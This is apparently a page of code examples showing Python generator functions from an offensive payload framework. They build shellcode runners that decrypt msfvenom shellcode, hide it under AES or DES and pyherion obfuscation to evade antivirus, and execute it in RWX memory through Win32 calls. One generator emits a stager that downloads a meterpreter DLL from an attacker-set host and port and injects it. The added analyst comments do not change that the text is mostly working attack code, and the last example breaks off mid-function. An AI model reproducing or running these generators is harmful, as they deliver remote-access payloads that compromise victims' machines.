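        payloadCode += "\t\treturn %s\n" % (rcvCStringName)
        # any failure (refused connection, short read, ...) yields None and the
        # injector is skipped - the template deliberately fails silently
        payloadCode += "\texcept: return None\n"

        # --- injector: copy the patched stage into RWX memory and run it ---
        payloadCode += "def %s(%s):\n" % (injectMethodName, tempShellcodeName)
        payloadCode += "\tif %s != None:\n" % (tempShellcodeName)
        payloadCode += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName)
        # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (fpName, shellcodeBufName)
        # virtual lock to prevent the memory from paging out to disk
        payloadCode += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % (fpName, shellcodeBufName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (tempCBuffer, shellcodeBufName, shellcodeBufName)
        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % (fpName, tempCBuffer, shellcodeBufName)
        # NOTE(review): the pointer goes through ctypes.c_int, which truncates
        # 64-bit addresses; the template assumes a 32-bit interpreter.
        payloadCode += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (fpName)
        # block until the stage's thread exits
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n"

        # --- entry point, optionally wrapped in a kill-date check ---
        if expire_payload.lower() == "x":
            payloadCode += "%s = %s()\n" % (shellCodeName, getDataMethodName)
            payloadCode += "%s(%s)\n" % (injectMethodName, shellCodeName)
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(expire_payload)))

            randToday = helpers.randomString()
            randExpire = helpers.randomString()

            payloadCode += 'from datetime import datetime\n'
            payloadCode += 'from datetime import date\n\n'
            payloadCode += randToday + ' = datetime.now()\n'
            # str(date) is YYYY-MM-DD; [2:] drops the century to fit "%y-%m-%d".
            # The comparison runs on the target's naive local clock: a courtesy
            # expiry, not a security control.
            payloadCode += randExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            payloadCode += 'if ' + randToday + ' < ' + randExpire + ':\n'
            payloadCode += "\t%s = %s()\n" % (shellCodeName, getDataMethodName)
            payloadCode += "\t%s(%s)\n" % (injectMethodName, shellCodeName)

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode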
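    def generate(self):
        """Return the Python 2 source of an AES-wrapped shellcode runner.

        The emitted script decrypts msfvenom shellcode at run time and runs it
        with the technique named by the ``inject_method`` option:

        * ``virtual`` - ``VirtualAlloc`` (0x3000 = MEM_COMMIT|MEM_RESERVE,
          0x40 = PAGE_EXECUTE_READWRITE) + ``RtlMoveMemory`` + ``CreateThread``
        * ``heap`` - ``HeapCreate`` (0x40000 = HEAP_CREATE_ENABLE_EXECUTE) +
          ``HeapAlloc`` + ``RtlMoveMemory`` + ``CreateThread``
        * anything else - ``create_string_buffer`` + ``cast`` to a ``CFUNCTYPE``
          and a direct call

        ``expire_payload`` is ``x`` (no kill date) or a number of days; in the
        latter case the whole runner sits under a date check.  ``use_pyherion``
        == ``y`` passes the finished source through ``encryption.pyherion``
        (every branch now uses ``encryption``; the heap branches used to call a
        ``crypters`` module that nothing else in this file references).

        Returns:
            str: the generated script (Python 2 only: it relies on
            ``.decode("string_escape")`` and PyCrypto's ``Crypto.Cipher.AES``).

        Raises:
            ValueError: if ``expire_payload`` is neither ``x`` nor an int.

        Security note: the AES key and the ciphertext are embedded in the same
        file, and ``AES.new(key)`` without a mode is ECB under PyCrypto, so the
        "encryption" is an obfuscation/AV-evasion layer, not confidentiality.
        """
        inject_method = self.required_options["inject_method"][0].lower()
        expire_payload = self.required_options["expire_payload"][0]

        # Resolve the kill date first so a bad day count fails before msfvenom
        # is run (same evaluation order as the original branches).
        if expire_payload.lower() == "x":
            expiry_header, indent = "", ""
        else:
            expiry_header, indent = self._expiryPrologue(expire_payload)

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names for the decrypt prelude
        RandPadding = helpers.randomString()
        RandDecodeAES = helpers.randomString()
        RandCipherObject = helpers.randomString()
        RandDecodedShellcode = helpers.randomString()

        # encrypt the shellcode and grab the randomized key
        (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

        # Decrypt-at-runtime prelude, identical for every injection technique.
        # '{' is the pad byte rstrip'ed after decryption - presumably what
        # encryption.encryptAES pads with (its implementation is not visible here).
        prelude = [
            RandPadding + " = '{'",
            RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")",
            RandCipherObject + " = AES.new('" + secret + "')",
            RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')",
        ]

        ctypes_import, stub_lines, terminator = self._injectionStub(inject_method, RandDecodedShellcode)

        # Create Payload code: imports, optional kill-date wrapper, then the
        # prelude and injection stub (tab-indented when wrapped).
        PayloadCode = ctypes_import
        PayloadCode += "from Crypto.Cipher import AES\n"
        PayloadCode += "import base64\n"
        PayloadCode += "import os\n"
        PayloadCode += expiry_header
        PayloadCode += "\n".join(indent + line for line in prelude + stub_lines) + terminator

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode

    def _expiryPrologue(self, days):
        """Return ``(header, indent)`` that wraps the runner in a kill-date check.

        ``days`` is the raw ``expire_payload`` option and must parse as an int
        (``ValueError`` otherwise).  ``header`` holds the datetime imports and an
        ``if now < expiry:`` line; ``indent`` is the ``"\\t"`` every following
        generated line must carry.  The check runs on the target's naive local
        clock, so it is a courtesy expiry, not a security control.
        """
        # Get our current date and add number of days to the date
        todaysdate = date.today()
        expiredate = str(todaysdate + timedelta(days=int(days)))

        RandToday = helpers.randomString()
        RandExpire = helpers.randomString()

        header = "from datetime import datetime\n"
        header += "from datetime import date\n\n"
        header += RandToday + " = datetime.now()\n"
        # str(date) is YYYY-MM-DD; [2:] drops the century to fit "%y-%m-%d"
        header += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
        header += "if " + RandToday + " < " + RandExpire + ":\n"
        return header, "\t"

    def _injectionStub(self, inject_method, decoded_var):
        """Return ``(ctypes_import, lines, terminator)`` for one injection technique.

        ``decoded_var`` names the generated-script variable that holds the
        decrypted shellcode as an escaped string.  ``lines`` carry no indentation
        and no newline; ``terminator`` follows the last line (``"\\n"`` for the
        ctypes-API variants, ``""`` for the cast variant, whose template has
        always ended without a trailing newline).
        """
        if inject_method in ("virtual", "heap"):
            buf_var = helpers.randomString()
            ptr_var = helpers.randomString()
            cbuf_var = helpers.randomString()
            thread_var = helpers.randomString()
            lines = [buf_var + ' = bytearray(' + decoded_var + '.decode("string_escape"))']
            if inject_method == "virtual":
                # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                lines.append(ptr_var + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + buf_var + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))')
            else:
                heap_var = helpers.randomString()
                # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE; 0x00000008 = HEAP_ZERO_MEMORY.
                # The stray space in "len( " is kept so the emitted source is unchanged.
                lines.append(heap_var + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + buf_var + ') * 2),ctypes.c_int(0))')
                lines.append(ptr_var + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + heap_var + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + buf_var + ')))')
            # NOTE(review): pointers and handles go through ctypes.c_int, which
            # truncates 64-bit values; the template assumes a 32-bit interpreter.
            lines += [
                cbuf_var + ' = (ctypes.c_char * len(' + buf_var + ')).from_buffer(' + buf_var + ')',
                'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + ptr_var + '),' + cbuf_var + ',ctypes.c_int(len(' + buf_var + ')))',
                thread_var + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + ptr_var + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))',
                'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + thread_var + '),ctypes.c_int(-1))',
            ]
            return "import ctypes\n", lines, "\n"

        # Fallback: wrap the bytes in a C buffer and call it as a function
        # (relies on `from ctypes import *` in the emitted header).
        str_var = helpers.randomString()
        cbuf_var = helpers.randomString()
        func_var = helpers.randomString()
        lines = [
            str_var + ' = ' + decoded_var + '.decode("string_escape")',
            cbuf_var + ' = create_string_buffer(' + str_var + ', len(' + str_var + '))',
            func_var + ' = cast(' + cbuf_var + ', CFUNCTYPE(c_void_p))',
            func_var + '()',
        ]
        return "from ctypes import *\n", lines, ""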
Example #31
    def generate(self):
        """Build the Python source of a shellcode-running script and return it as a string.

        Dispatches on two entries of self.required_options:
          * "inject_method": "virtual" (VirtualAlloc + CreateThread) or "heap"
            (HeapCreate/HeapAlloc + CreateThread); any other value falls through
            to the ctypes create_string_buffer/cast variant in the final else.
          * "expire_payload": "x" emits the script unconditionally; any other
            value is parsed with int() as a number of days and the emitted
            script is wrapped in a local date comparison so it only runs
            before that date.
        With "use_pyherion" == "y" the finished source is passed through
        encryption.pyherion before being returned.

        Raises ValueError (from int()) when "expire_payload" is neither "x"
        nor an integer string.

        Analyst note: every variant embeds the raw shellcode as a plain string
        literal in the emitted source, so the payload bytes are directly
        recoverable from the generated file; the expiry guard is a plain
        datetime.now() comparison inside the emitted script.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()

                # Create Payload code
                # 0x3000 / 0x40 are MEM_COMMIT|MEM_RESERVE / PAGE_EXECUTE_READWRITE;
                # an RWX allocation followed by RtlMoveMemory + CreateThread is the
                # sequence an analyst should expect to see in the emitted script.
                PayloadCode = 'import ctypes\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
            else:

                # Get our current date and add number of days to the date
                # int() raises ValueError here for any non-integer value other than "x"
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                # str(date) is "YYYY-MM-DD"; [2:] drops the century so the literal
                # matches the "%y-%m-%d" strptime format in the emitted line
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                # every following line is tab-prefixed so it sits inside the if-block above
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["inject_method"][0].lower() == "heap":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                HeapVar = helpers.randomString()

                # Create Payload code
                # Same copy-and-CreateThread sequence as the "virtual" branch, but the
                # buffer comes from a private heap created with twice the shellcode length
                PayloadCode = 'import ctypes\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                # int() raises ValueError here for any non-integer value other than "x"
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                # str(date) is "YYYY-MM-DD"; [2:] drops the century to match "%y-%m-%d"
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                # tab-prefixed lines sit inside the if-block above
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        # NOTE: this else pairs with the "heap" test above, so any inject_method
        # value other than "virtual" or "heap" lands here (ctypes cast variant).
        else:
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # The shellcode is emitted as a double-quoted string literal, wrapped in a
                # ctypes buffer and cast to a callable; no Win32 allocation APIs are used here
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date
                # int() raises ValueError here for any non-integer value other than "x"
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(
                    days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                # str(date) is "YYYY-MM-DD"; [2:] drops the century to match "%y-%m-%d"
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[
                    2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                # tab-prefixed lines sit inside the if-block above
                PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
Example #32
    def generate(self):
        """Return Python 2 source for a stager that fetches a payload over HTTPS and runs it in memory.

        The emitted script (Python 2: urllib2, xrange, `except X, e`) defines
        three helper functions with randomised names:
          * a checksum helper returning sum(ord(ch)) % 0x100 of a string;
          * a function that tries up to 64 times to find a short random URI
            whose checksum is 92 (falls off the end and returns None if none
            is found);
          * a downloader that installs a urllib2 ProxyHandler opener, requests
            https://LHOST:LPORT/<uri> with a fixed MSIE 6.1 User-Agent, and
            returns the body only when Content-Length exceeds 100000 ('' on
            a smaller body or on URLError; the bare except returns the body
            whenever the Content-Length header is missing or non-numeric).
        The downloaded bytes are then copied into a VirtualAlloc'd buffer with
        RtlMoveMemory and started with CreateThread.

        LHOST and LPORT come from self.required_options and are spliced into
        the source verbatim (no quoting or escaping), so a value containing a
        double quote would break the emitted script. With "use_pyherion" == "y"
        the finished source is passed through encryption.pyherion.

        Analyst note: no certificate validation is configured explicitly on the
        HTTPS request, and the option keys mix cases ("LHOST"/"LPORT" vs
        "use_pyherion"), unlike the other generators on this page.
        """

        payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"

        # randomize everything, yo'
        sumMethodName = helpers.randomString()
        checkinMethodName = helpers.randomString()

        randLettersName = helpers.randomString()
        randLetterSubName = helpers.randomString()
        randBaseName = helpers.randomString()

        downloadMethodName = helpers.randomString()
        hostName = helpers.randomString()
        portName = helpers.randomString()
        requestName = helpers.randomString()
        tName = helpers.randomString()

        injectMethodName = helpers.randomString()
        dataName = helpers.randomString()
        byteArrayName = helpers.randomString()
        ptrName = helpers.randomString()
        bufName = helpers.randomString()
        handleName = helpers.randomString()
        data2Name = helpers.randomString()
        proxy_var = helpers.randomString()
        opener_var = helpers.randomString()

        # helper method that returns the sum of all ord values in a string % 0x100
        # (the "%%" survives the outer % formatting as a literal "%" in the emitted code)
        payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % (
            sumMethodName)

        # method that generates a new checksum value for checkin to the meterpreter handler
        # up to 64 attempts; there is no return after the loop, so an unlucky run yields None
        payloadCode += "def %s():\n\tfor x in xrange(64):\n" % (
            checkinMethodName)
        payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % (
            randBaseName)
        payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % (
            randLettersName)
        payloadCode += "\t\tfor %s in %s:\n" % (randLetterSubName,
                                                randLettersName)
        payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % (
            sumMethodName, randBaseName, randLetterSubName, randBaseName,
            randLetterSubName)

        # method that connects to a host/port over https and downloads the hosted data
        payloadCode += "def %s(%s,%s):\n" % (downloadMethodName, hostName,
                                             portName)
        # ProxyHandler() with no argument picks up the environment's proxy settings
        payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
        payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
        payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
        payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" % (
            requestName, hostName, portName, checkinMethodName)
        payloadCode += "\ttry:\n"
        payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" % (tName, requestName)
        payloadCode += "\t\ttry:\n"
        # size gate: only bodies larger than 100000 bytes are accepted as the payload
        payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % (
            tName, tName)
        payloadCode += "\t\t\telse: return ''\n"
        # bare except: a missing/non-numeric Content-Length bypasses the size gate
        payloadCode += "\t\texcept: return %s.read()\n" % (tName)
        payloadCode += "\texcept urllib2.URLError, e: return ''\n"

        # method to inject a reflective .dll into memory
        # 0x3000 / 0x40 are MEM_COMMIT|MEM_RESERVE / PAGE_EXECUTE_READWRITE; the
        # RWX allocation + RtlMoveMemory + CreateThread sequence is the pattern
        # an analyst should expect in the emitted script
        payloadCode += "def %s(%s):\n" % (injectMethodName, dataName)
        payloadCode += "\tif %s != \"\":\n" % (dataName)
        payloadCode += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % (
            ptrName, byteArrayName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % (
            bufName, byteArrayName, byteArrayName)
        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" % (
            ptrName, bufName, byteArrayName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % (
            handleName, ptrName)
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % (
            handleName)

        # download the meterpreter .dll and inject it
        # LHOST/LPORT are interpolated unescaped into a double-quoted literal
        payloadCode += "%s = ''\n" % (data2Name)
        payloadCode += "%s = %s(\"%s\", %s)\n" % (
            data2Name, downloadMethodName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        payloadCode += "%s(%s)\n" % (injectMethodName, data2Name)

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
Example #33
    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += RandIV + ' = \'' + iv + '\'\n'
                PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
                PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
                PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
                PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                ShellcodeVariableName = helpers.randomString()
                RandIV = helpers.randomString()
                RandDESKey = helpers.randomString()
                RandDESPayload = helpers.randomString()
                RandEncShellCodePayload = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and get our randomized key/iv
                (EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)

                # Create Payload File
                PayloadCode = 'from Crypto.Cipher import DES\n'
                PayloadCode += 'import ctypes as avlol\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
